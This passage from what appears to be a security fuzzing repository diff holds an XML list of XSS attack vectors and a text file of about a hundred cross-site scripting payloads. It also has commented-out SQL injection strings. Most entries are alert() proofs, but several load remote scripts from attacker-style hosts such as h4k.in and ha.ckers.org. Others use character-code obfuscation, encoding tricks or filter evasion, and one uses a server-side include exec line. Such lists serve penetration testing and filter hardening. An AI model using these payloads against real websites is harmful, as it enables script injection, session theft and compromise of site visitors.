<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script src=http://h4k.in/i.js&gt;&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;a=document.createElement(&apos;script&apos;);a.src=&apos;http://h4k.in/i.js&apos;;document.body.appendChild(a);&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<!-- disabled 03-jan-08
<attack>
<name> ___ SQL Injections ___x</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Basic SQL Injection 1</name>
<code> 1 OR 1 = 1 </code>
<desc>Very basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 2</name>
<code>1' OR '1'='1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 3</name>
<code>1\'1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 4</name>
<code>') OR 1 &lt; 2 #</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
-->
<attack>
<name> --- Browser specific attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>IE VBScript injection</name>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE expression injection</name>
<code>&quot; style=&quot;color: expression(alert(0));&quot; a=&quot;</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE closing-tag expression injection</name>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE backticked semicolon injection</name>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection</name>
<code>&quot; style=&quot;-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<desc>This works in Gecko browsers only.</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection (filter evading)</name>
<code>&quot; sstyle=&quot;foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Weird stuff ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>HTTP Reponse Splitting XSS</name>
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
<desc>HTTP response splitting vector with XSS alert</desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name>Nullbyte XSS</name>
<code>c%00&quot;&quot;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc></desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Style injections and hw/fw-encoding attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</name>
<code>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- URL injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>http://aa&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;</name>
<code>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</code>
<desc></desc>
<label>URL injection</label>
<browser/>
</attack>
</xss>

109
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt Normal file
View file

@ -0,0 +1,109 @@
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<BR SIZE="&{alert('XSS')}">
<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>

1080
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.xml
View file

File diff suppressed because it is too large Load diff